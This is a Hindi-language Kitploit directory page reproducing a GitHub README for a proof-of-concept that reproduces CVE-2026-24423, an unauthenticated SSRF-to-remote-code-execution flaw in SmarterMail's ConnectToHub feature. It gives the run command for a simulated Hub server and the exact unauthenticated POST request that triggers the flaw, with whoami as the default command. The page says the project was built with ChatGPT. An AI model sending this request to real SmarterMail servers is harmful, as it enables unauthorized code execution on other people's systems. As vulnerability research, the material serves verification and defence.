Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24423 — CVE-2026-24423 के लिए प्रजनन स्क्रिप्ट, जो SmarterMail ConnectToHub में एक ट्रस्ट सीमा उल्लंघन है, जिससे SSRF और संभावित रिमोट कोड निष्पादन होता है। इसमें एक सिम्युलेटेड Hub सर्वर और कमजोर API को ट्रिगर करने के निर्देश शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/aavamin/cve-2026-24423
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubaavamin/cve-2026-24423

CVE-2026-24423

CVE-2026-24423 के लिए प्रजनन स्क्रिप्ट, जो SmarterMail ConnectToHub में एक ट्रस्ट सीमा उल्लंघन है, जिससे SSRF और संभावित रिमोट कोड निष्पादन होता है। इसमें एक सिम्युलेटेड Hub सर्वर और कमजोर API को ट्रिगर करने के निर्देश शामिल हैं।

रिपॉजिटरी देखें
8187 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24423

root@kitploit:~
# CVE-2026-24423 – पुनरुत्पादन

> ⚠️ **केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए / For security research and authorized testing only**


## परिचय (Overview)

यह प्रोजेक्ट **CVE-2026-24423** भेद्यता को पुनरुत्पादित करने के लिए है।  
यह भेद्यता **SmarterMail ConnectToHub** सुविधा में मौजूद है, जिसका मूल कारण है:

- प्रशासनिक स्तर का इंटरफ़ेस प्रमाणीकरण के बिना है  
- सर्वर उपयोगकर्ता द्वारा निर्दिष्ट Hub से सक्रिय रूप से कनेक्ट होता है (SSRF)  
- बाहरी Hub से लौटाया गया डेटा सीधे स्थानीय सिस्टम-स्तरीय संचालन में उपयोग किया जाता है  

यह भेद्यता **डिज़ाइन-स्तरीय विश्वास सीमा उल्लंघन (Trust Boundary Violation)** की श्रेणी में आती है, जो अंततः दूरस्थ कोड निष्पादन का कारण बन सकती है।

यह रिपॉजिटरी केवल **भेद्यता सत्यापन और तकनीकी अनुसंधान** के लिए है, शोषण/हथियारीकरण के लिए नहीं।

उपयोग विधि (Usage)

1️⃣ Hub सिमुलेशन सेवा प्रारंभ करें

Start Hub Simulation Server

root@kitploit:~
python3 cve-2026-24423.py

यह स्क्रिप्ट निम्न कार्य करेगी:

  • 80 पोर्ट पर सुनना
  • SmarterMail Hub इंटरफ़ेस का अनुकरण करना
  • SystemMount कॉन्फ़िगरेशन युक्त JSON प्रतिक्रिया लौटाना

2️⃣ भेद्यता इंटरफ़ेस ट्रिगर करें

Trigger the Vulnerable API

Yakit या Burp Suite का उपयोग करके अनुरोध भेजें:

root@kitploit:~
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json

{
  "hubAddress": "http://ip",
  "oneTimePassword": "test",
  "nodeName": "victim"
}

इस इंटरफ़ेस के लिए प्रमाणीकरण की आवश्यकता नहीं है No authentication is required.


3️⃣ पुनरुत्पादन विफलता का समाधान

Troubleshooting

यदि भेद्यता पुनरुत्पादन विफल हो जाता है:

  • कृपया cve-2026-24423.py में MountPath पैरामीटर संशोधित करें

4️⃣ पुनरुत्पादन परिणाम

Result

जब भेद्यता सफलतापूर्वक ट्रिगर होती है, तो SmarterMail Hub से लौटाए गए डेटा को पार्स करेगा, डिफ़ॉल्ट कोड केवल whoami कमांड निष्पादित करता है।

उदाहरण स्क्रीनशॉट / Example:

result


आभार (Credit)

यह प्रोजेक्ट ChatGPT द्वारा पूरा किया गया है।

root@kitploit:~
टूल डाउनलोड करें